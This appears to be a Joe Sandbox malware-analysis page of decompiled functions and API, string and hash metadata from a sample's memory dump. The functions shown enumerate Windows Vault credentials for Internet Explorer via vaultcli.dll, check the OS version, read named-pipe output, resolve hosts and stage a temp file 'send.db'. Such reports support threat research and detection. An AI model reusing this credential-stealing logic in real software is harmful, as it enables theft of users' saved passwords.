Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d16257a32eaa1f6f2ee60aa1ac7952380bf939c7a6bfefcf97cf2a0149233ecc
Instruction ID: cbcf44020aa33a4839b1aea07d6b059878934dae364cd49027ceaa416d0c1c07
Opcode Fuzzy Hash: d16257a32eaa1f6f2ee60aa1ac7952380bf939c7a6bfefcf97cf2a0149233ecc
Instruction Fuzzy Hash: 7BF01EB1B00B26BEC7485F368C80B86FE2AFF09260F00422BA12C42221CB712434DFD2

Uniqueness

Uniqueness Score: -1.00%

Function 0103A968 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0103A968(void* __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v92;
				char _v96;
				char _v100;
				void* _t124;
				void* _t127;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t147;
				void* _t148;
				void* _t159;
				void* _t162;
				void* _t186;
				char _t226;
				intOrPtr _t229;
				char _t234;
				void* _t235;

				_t234 = 0;
				_t186 = __ecx;
				_t226 = 0;
				_v16 = 0;
				_v44 = 0;
				_v20 = 0;
				_v12 = 0;
				_v8 = 0;
				_v84 = 0;
				if(E0103ACBE(__ecx) != 0) {
					_push( &_v16);
					_push(0);
					_push(0x104c150);
					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
						_push( &_v20);
						_push( &_v44);
						_push(0x200);
						_push(_v16);
						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
							_t240 = _v44;
							if(_v44 != 0) {
								_v80 = 0;
								_v40 = 0;
								_v36 = 0;
								do {
									_t124 = E0103AC8B(_t240);
									_push(0x10);
									_push(0x104c140);
									if(_t124 == 0) {
										_push(_t226);
										_v28 = _v20 + _v40;
										_t127 = E01031000();
										_t235 = _t235 + 0xc;
										__eflags = _t127;
										if(__eflags == 0) {
											E010336F7( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
											_t133 = E0103335A( &_v32, E010336F7( &_v64, L"Internet Explorer"));
											E01035FEB(_v64);
											_v64 = _t234;
											__eflags = _t133;
											if(__eflags != 0) {
												asm("movaps xmm0, [0x104a910]");
												asm("movups [ebp-0x60], xmm0");
												E01033549( &_v100, E010336F7( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
												E01035FEB(_v68);
												_v68 = _t234;
												E01033549( &_v96, E010336F7( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
												E01035FEB(_v72);
												_v12 = _t234;
												_t147 = _v28;
												_v72 = _t234;
												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
												__eflags = _t148;
												if(_t148 == 0) {
													_v8 = _v12;
													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
													E01033549( &_v84, E010336F7( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
													E01035FEB(_v76);
													_v76 = _t234;
												}
												_t235 = _t235 - 0x10;
												E01031FF2(_t235,  &_v100);
												E01032028(_t186);
												E01031441( &_v100);
											}
											E01035FEB(_v32);
											_v32 = _t234;
											goto L18;
										}
									} else {
										_t226 = _v36 + _v20;
										_push(_t226);
										_v8 = _t226;
										_t159 = E01031000();
										_t235 = _t235 + 0xc;
										if(_t159 == 0) {
											E010336F7( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
											_t162 = E0103335A( &_v24, E010336F7( &_v48, L"Internet Explorer"));
											E01035FEB(_v48);
											_v48 = _t234;
											if(_t162 != 0) {
												_t229 = _v8;
												asm("movaps xmm0, [0x104a910]");
												asm("movups [ebp-0x60], xmm0");
												E01033549( &_v100, E010336F7( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
												E01035FEB(_v52);
												_v52 = _t234;
												E01033549( &_v96, E010336F7( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
												E01035FEB(_v56);
												_v12 = _t234;
												_push( &_v12);
												_push(_t234);
												_push(_t234);
												_push(_t234);
												_push( *((intOrPtr*)(_t229 + 0x18)));
												_v56 = _t234;
												_push( *((intOrPtr*)(_t229 + 0x14)));
												_push(_t229);
												_push(_v16);
												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
													_v8 = _v12;
													E01033549( &_v92, E010336F7( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
													E01035FEB(_v60);
													_v60 = _t234;
												}
												_t235 = _t235 - 0x10;
												E01031FF2(_t235,  &_v100);
												E01032028(_t186);
												E01031441( &_v100);
											}
											E01035FEB(_v24);
											_v24 = _t234;
											L18:
											_t226 = _v8;
										}
									}
									_v36 = _v36 + 0x38;
									_t129 = _v80 + 1;
									_v40 = _v40 + 0x34;
									_v80 = _t129;
								} while (_t129 < _v44);
								_t234 = _v84;
							}
						}
					}
				}
				if(_v20 != 0) {
					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
				}
				if(_v16 != 0) {
					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
				}
				FreeLibrary( *(_t186 + 0xc0));
				E01035FEB(_t234);
				E01035FEB(0);
				return E01035FEB(0);
			}

0x0103a970
0x0103a972
0x0103a975
0x0103a977
0x0103a97a
0x0103a97d
0x0103a980
0x0103a983
0x0103a986
0x0103a990
0x0103a999
0x0103a99a
0x0103a99b
0x0103a9a8
0x0103a9b1
0x0103a9b5
0x0103a9b6
0x0103a9bb
0x0103a9c6
0x0103a9cf
0x0103a9d1
0x0103a9d7
0x0103a9da
0x0103a9dd
0x0103a9e0
0x0103a9e0
0x0103a9e5
0x0103a9e7
0x0103a9ee
0x0103ab12
0x0103ab13
0x0103ab16
0x0103ab1b
0x0103ab1e
0x0103ab20
0x0103ab2f
0x0103ab45
0x0103ab4f
0x0103ab54
0x0103ab57
0x0103ab59
0x0103ab65
0x0103ab6c
0x0103ab80
0x0103ab88
0x0103ab96
0x0103aba3
0x0103abab
0x0103abb3
0x0103abb7
0x0103abc0
0x0103abca
0x0103abd0
0x0103abd2
0x0103abdd
0x0103abe3
0x0103abf0
0x0103abf8
0x0103abfd
0x0103abfd
0x0103ac00
0x0103ac09
0x0103ac10
0x0103ac18
0x0103ac18
0x0103ac20
0x0103ac25
0x00000000
0x0103ac25
0x0103a9f4
0x0103a9f7
0x0103a9fa
0x0103a9fb
0x0103a9fe
0x0103aa03
0x0103aa08
0x0103aa14
0x0103aa2a
0x0103aa34
0x0103aa39
0x0103aa3e
0x0103aa44
0x0103aa4a
0x0103aa51
0x0103aa65
0x0103aa6d
0x0103aa7b
0x0103aa88
0x0103aa90
0x0103aa98
0x0103aa9b
0x0103aa9c
0x0103aa9d
0x0103aa9e
0x0103aa9f
0x0103aaa2
0x0103aaa5
0x0103aaa8
0x0103aaa9
0x0103aab4
0x0103aabc
0x0103aacf
0x0103aad7
0x0103aadc
0x0103aadc
0x0103aadf
0x0103aae8
0x0103aaef
0x0103aaf7
0x0103aaf7
0x0103aaff
0x0103ab04
0x0103ac28
0x0103ac28
0x0103ac28
0x0103aa08
0x0103ac2e
0x0103ac32
0x0103ac33
0x0103ac37
0x0103ac3a
0x0103ac43
0x0103ac43
0x0103a9d1
0x0103a9c6
0x0103a9a8
0x0103ac4a
0x0103ac4f
0x0103ac4f
0x0103ac59
0x0103ac5f
0x0103ac5f
0x0103ac6b
0x0103ac73
0x0103ac7a
0x0103ac8a

APIs

Part of subcall function 0103ACBE: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0103A98E), ref: 0103ACC6

FreeLibrary.KERNEL32(?), ref: 0103AC6B

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 0103335A: lstrcmpW.KERNEL32(?,?), ref: 01033364

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Strings

8, xrefs: 0103AC2E
Internet Explorer, xrefs: 0103AA19, 0103AB34
4, xrefs: 0103AC33

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FreeLibrarylstrlen$DispatcherExceptionLoadUserVirtuallstrcmplstrcpy
String ID: 4$8$Internet Explorer
API String ID: 2576498667-747916358
Opcode ID: 6503eaa770c69773c6fd14f20d51923196ad9d5c7a3893a59ea48feabdc69da5
Instruction ID: b00c99714a00b6587eac816647639c004e412159add7094ac82e9ede5590530f
Opcode Fuzzy Hash: 6503eaa770c69773c6fd14f20d51923196ad9d5c7a3893a59ea48feabdc69da5
Instruction Fuzzy Hash: 69A13B71E0021AEFDF05EFA5DC859EEBB7DFF98600F144059E481AB261DB70AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01040F61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E01040F61() {
				intOrPtr _v6;
				signed int _v12;
				intOrPtr _v272;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				struct HINSTANCE__* _t33;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t53;
				intOrPtr _t62;
				_Unknown_base(*)()* _t69;
				void* _t71;

				_v288 = 0x11c;
				_t33 = LoadLibraryA("ntdll.dll");
				if(_t33 == 0) {
					L3:
					_t71 = 2;
					if(_v272 != _t71) {
						goto L43;
					} else {
						_t35 = _v6;
						if(_t35 != 1) {
							if(_t35 == 2 || _t35 == 3) {
								if(_v284 != 5) {
									if(_v284 != 6) {
										if(_v284 != 0xa || _v280 != 0) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x2710;
										}
									} else {
										_t38 = _v280;
										if(_t38 != 0) {
											if(_t38 != 1) {
												if(_t38 != _t71) {
													if(_t38 != 3) {
														goto L43;
													} else {
														return (_v12 & 0x0000ffff) + 0x189c;
													}
												} else {
													return (_v12 & 0x0000ffff) + 0x1838;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x17d4;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x1770;
										}
									}
								} else {
									if(_v280 != 1) {
										if(_v280 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x1450;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x13ec;
									}
								}
							} else {
								goto L43;
							}
						} else {
							if(_v284 != 5) {
								if(_v284 != 6) {
									if(_v284 != 0xa || _v280 != 0) {
										goto L43;
									} else {
										return (_v12 & 0x0000ffff) + 0x3e8;
									}
								} else {
									_t53 = _v280;
									if(_t53 != 0) {
										if(_t53 != 1) {
											if(_t53 != _t71) {
												if(_t53 != 3) {
													goto L43;
												} else {
													return (_v12 & 0x0000ffff) + 0x276;
												}
											} else {
												return (_v12 & 0x0000ffff) + 0x26c;
											}
										} else {
											return (_v12 & 0x0000ffff) + 0x262;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x258;
									}
								}
							} else {
								_t62 = _v280;
								if(_t62 != 0) {
									if(_t62 != 1) {
										if(_t62 != _t71) {
											goto L43;
										} else {
											return (_v12 & 0x0000ffff) + 0x208;
										}
									} else {
										return (_v12 & 0x0000ffff) + 0x1fe;
									}
								} else {
									return (_v12 & 0x0000ffff) + 0x1f4;
								}
							}
						}
					}
				} else {
					_t69 = GetProcAddress(_t33, "RtlGetVersion");
					if(_t69 == 0) {
						L43:
						return 0;
					} else {
						 *_t69( &_v288);
						goto L3;
					}
				}
			}

0x01040f6f
0x01040f79
0x01040f81
0x01040fa0
0x01040fa2
0x01040fa9
0x00000000
0x01040faf
0x01040faf
0x01040fb4
0x01041073
0x01041084
0x010410b4
0x01041101
0x00000000
0x0104110c
0x01041116
0x01041116
0x010410b6
0x010410b6
0x010410be
0x010410ce
0x010410dd
0x010410ed
0x00000000
0x010410ef
0x010410f9
0x010410f9
0x010410df
0x010410e9
0x010410e9
0x010410d0
0x010410da
0x010410da
0x010410c0
0x010410ca
0x010410ca
0x010410be
0x01041086
0x0104108d
0x010410a0
0x00000000
0x010410a2
0x010410ac
0x010410ac
0x0104108f
0x01041099
0x01041099
0x0104108d
0x00000000
0x00000000
0x00000000
0x01040fba
0x01040fc1
0x01041002
0x01041053
0x00000000
0x01041066
0x01041070
0x01041070
0x01041004
0x01041004
0x0104100c
0x0104101c
0x0104102b
0x0104103b
0x00000000
0x01041041
0x0104104b
0x0104104b
0x0104102d
0x01041037
0x01041037
0x0104101e
0x01041028
0x01041028
0x0104100e
0x01041018
0x01041018
0x0104100c
0x01040fc3
0x01040fc3
0x01040fcb
0x01040fdb
0x01040fea
0x00000000
0x01040ff0
0x01040ffa
0x01040ffa
0x01040fdd
0x01040fe7
0x01040fe7
0x01040fcd
0x01040fd7
0x01040fd7
0x01040fcb
0x01040fc1
0x01040fb4
0x01040f83
0x01040f89
0x01040f91
0x01041117
0x0104111a
0x01040f97
0x01040f9e
0x00000000
0x01040f9e
0x01040f91

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 01040F79
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 01040F89

Strings

RtlGetVersion, xrefs: 01040F83
ntdll.dll, xrefs: 01040F6A

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 43b4d6d0c2c1224635f551948bee078e69109266f749cd3a69e429c5811e415d
Instruction ID: 2f829d1d40e2ddbae6f134bca8e6da3262b6601e8ed12ea85c183502d9c711d8
Opcode Fuzzy Hash: 43b4d6d0c2c1224635f551948bee078e69109266f749cd3a69e429c5811e415d
Instruction Fuzzy Hash: 254138B4A0016CABDFA58B59D8873FCB6F4AB0674DF0004F5F685E51C2E2B8DAC5CA54

Uniqueness

Uniqueness Score: -1.00%

Function 0103FEB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89
filepipeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103FEB5(intOrPtr* __ecx, void* __edx) {
				long _v8;
				long _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				void* _t34;
				signed int _t37;
				char* _t63;
				void* _t70;
				intOrPtr* _t71;
				void* _t72;

				_t71 = __ecx;
				while(1) {
					_v8 = 0;
					if(PeekNamedPipe( *(_t71 + 8), 0, 0, 0,  &_v8, 0) == 0) {
						break;
					}
					_t30 = _v8;
					if(_v8 == 0) {
						return 1;
					}
					_t34 = E01031085(_t30 + 1);
					_v12 = _v12 & 0x00000000;
					_t70 = _t34;
					if(ReadFile( *(_t71 + 8), _t70, _v8,  &_v12, 0) == 0) {
						break;
					}
					_v28 = 0;
					_v24 = 0;
					 *((char*)(_t70 + _v12)) = 0;
					E010330CC( &_v28, _t70, _v12);
					E01031099(_t70);
					E0103300A( &_v28,  &_v20);
					E0103305D( &_v28,  &_v16);
					_t63 =  &_v16;
					E0103319E(_t63);
					E01033507(_t72,  &_v16);
					 *((intOrPtr*)( *_t71 + 4))(_t63);
					E01035FEB(_v16);
					E01035FEB(_v20);
					_v20 = _v20 & 0x00000000;
					E01033148( &_v28);
				}
				_t37 = GetLastError();
				if(_t37 == 0x6d || _t37 == 0xe8) {
					return 0;
				} else {
					return _t37 | 0xffffffff;
				}
			}

0x0103febd
0x0103ff68
0x0103ff75
0x0103ff80
0x00000000
0x00000000
0x0103fec4
0x0103fec9
0x00000000
0x0103ff9f
0x0103fed1
0x0103fed6
0x0103feda
0x0103fef2
0x00000000
0x00000000
0x0103fefd
0x0103ff00
0x0103ff03
0x0103ff0d
0x0103ff13
0x0103ff20
0x0103ff2c
0x0103ff31
0x0103ff34
0x0103ff40
0x0103ff49
0x0103ff4f
0x0103ff57
0x0103ff5c
0x0103ff63
0x0103ff63
0x0103ff86
0x0103ff8f
0x00000000
0x0103ff98
0x00000000
0x0103ff98

APIs

ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0103FEEA
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?), ref: 0103FF78
GetLastError.KERNEL32(?,?,00000000,00000000), ref: 0103FF86

Strings

@Mqt, xrefs: 0103FF86

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ErrorFileLastNamedPeekPipeRead
String ID: @Mqt
API String ID: 1179599418-2740872224
Opcode ID: b39669da1781b16cb6f69560952596f4aa93efe7f3d0120322d4d43c7db9f073
Instruction ID: b0da708811aeea2b36e3faf2d4e093fdfef0f7227c61f744483c398da198c2d9
Opcode Fuzzy Hash: b39669da1781b16cb6f69560952596f4aa93efe7f3d0120322d4d43c7db9f073
Instruction Fuzzy Hash: AC214F71D0010AAFDB18EBA4C995DFFBBBCEF95301F100569E592E61A0DB709A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 010326BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010326BB(void* __ecx, void* __edx, char _a4) {
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v44;
				intOrPtr _v48;
				void _v56;
				intOrPtr _t32;
				void* _t44;
				signed int _t54;
				void* _t56;
				void* _t62;

				_t44 = __ecx;
				_v24 =  *((intOrPtr*)(_a4 + 4));
				E0103373F( &_v20, _a4 + 8);
				E01033666(E01035DB3(__edx,  &_v16),  &_a4);
				_t50 = _v16;
				_t32 = E01035FEB(_v16);
				__imp__#11(_a4, _t56);
				_t61 = _t32;
				if(_t32 == 0xffffffff) {
					_v12 = _v12 & 0x00000000;
					_t54 = 8;
					memset( &_v56, 0, _t54 << 2);
					_t62 = _t62 + 0xc;
					_t50 = 0;
					_v48 = 1;
					_v44 = 6;
					__imp__getaddrinfo(_a4, 0,  &_v56,  &_v12);
					_t61 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x18)) + 4));
				}
				E0103373F(_t62,  &_v20);
				E01043E36(0, _t62, _t44, _v24, _t61, _t50);
				E01035FEB(_a4);
				return E01035FEB(_v20);
			}

0x010326c6
0x010326d1
0x010326d8
0x010326ee
0x010326f3
0x010326f6
0x010326fe
0x01032704
0x01032709
0x0103270b
0x01032714
0x01032717
0x01032717
0x01032717
0x0103271c
0x01032727
0x01032734
0x01032740
0x01032740
0x0103274a
0x01032755
0x0103275d
0x0103276e

APIs

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,01034FB1,?), ref: 01033693
Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 010336BE

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

inet_addr.WS2_32(?), ref: 010326FE
getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 01032734

Strings

pREw, xrefs: 01032734
~Fw, xrefs: 010326FE

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$FreeVirtualgetaddrinfoinet_addrlstrcpy
String ID: pREw$~Fw
API String ID: 4256520207-2375458743
Opcode ID: 0857834a760c8dad8813b048067af0446057973821b7e4197bc58997994bf2a1
Instruction ID: 50d57590fee444efb5e6d7e3938a1b9a6aa0596802cb59d51f3fabe1dc6b1eac
Opcode Fuzzy Hash: 0857834a760c8dad8813b048067af0446057973821b7e4197bc58997994bf2a1
Instruction Fuzzy Hash: DF216376900109AFCF14EFA4CD84DDEBBBDFF54250F004565E951A72A0DB709A44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010327FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E010327FF(void* __ecx, void* __edx, char _a4) {
				signed int _v12;
				char _v16;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				intOrPtr _t25;
				intOrPtr _t34;
				signed int _t40;
				void* _t42;
				void* _t43;
				void* _t44;

				_t34 =  *((intOrPtr*)(_a4 + 4));
				_t44 = __ecx;
				E01033666(E01035DB3(__edx,  &_v16),  &_a4);
				_t38 = _v16;
				_t25 = E01035FEB(_v16);
				__imp__#11(_a4);
				if(_t25 == 0xffffffff) {
					_v12 = _v12 & 0x00000000;
					_t43 =  &_v48;
					_t40 = 8;
					memset(_t43, 0, _t40 << 2);
					_t42 = _t43 + _t40;
					_t38 = 0;
					_v40 = 1;
					_v36 = 6;
					__imp__getaddrinfo(_a4, 0,  &_v48,  &_v12);
					_t25 =  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x18)) + 4));
				}
				E01045F88(_t34, _t42, _t38, _t44, _t34, _t25);
				return E01035FEB(_a4);
			}

0x0103280b
0x0103280e
0x01032821
0x01032826
0x01032829
0x01032831
0x0103283a
0x0103283c
0x01032840
0x01032845
0x01032848
0x01032848
0x01032848
0x0103284d
0x01032858
0x01032865
0x01032871
0x01032871
0x01032878
0x01032889

APIs

Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,01034FB1,?), ref: 01033693
Part of subcall function 01033666: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,01034FB1,?,?,?,?,?,00000000), ref: 010336BE

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

inet_addr.WS2_32(?), ref: 01032831
getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 01032865

Strings

pREw, xrefs: 01032865
~Fw, xrefs: 01032831

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$FreeVirtualgetaddrinfoinet_addr
String ID: pREw$~Fw
API String ID: 2496385908-2375458743
Opcode ID: 6103f1db53629b029abdcb39badc78c85912ead57f09b821dc28569ed37d456e
Instruction ID: 0010c4e41fdafd14e8e71e08e25ea4063bcfdadea224043a65ce611ed3451864
Opcode Fuzzy Hash: 6103f1db53629b029abdcb39badc78c85912ead57f09b821dc28569ed37d456e
Instruction Fuzzy Hash: AA110C75A00108AFDB14EFA4DC85EDEBBBDEB48260F008565F951AB2A0DB71DD458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 010452FD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E010452FD(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				signed int _v28;
				char _v32;
				short _v2080;
				void* _t42;
				void* _t47;

				_t42 = __edx;
				 *((intOrPtr*)(__ebx + 0x46183c1)) =  *((intOrPtr*)(__ebx + 0x46183c1)) + __ecx;
				_t47 = __ecx;
				E01031052( &_v2080, 0, 0x400);
				GetTempPathW(0x400,  &_v2080);
				lstrcatW( &_v2080, L"send.db");
				_t48 = _t47 + 4;
				E01033549(_t47 + 4, E010336F7( &_v8,  &_v2080));
				E01035FEB(_v8);
				_t12 =  &_v28;
				_v28 = _v28 & 0x00000000;
				asm("xorps xmm0, xmm0");
				_v32 = 0x35;
				asm("movups [ebp-0x14], xmm0");
				E0103378B(E01033873( &_v32, _t42, _t48),  *_t12, _a4);
				E01033777( &_v32);
				return _a4;
			}

0x010452fd
0x010452ff
0x01045321
0x01045323
0x01045333
0x01045345
0x01045351
0x01045360
0x01045368
0x01045370
0x01045370
0x01045377
0x0104537a
0x01045382
0x0104538d
0x01045395
0x010453a0

APIs

GetTempPathW.KERNEL32(00000400,?), ref: 01045333
lstrcatW.KERNEL32(?,send.db), ref: 01045345

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01033549: lstrcpyW.KERNEL32 ref: 0103356E

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Strings

5, xrefs: 0104537A
send.db, xrefs: 01045339

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
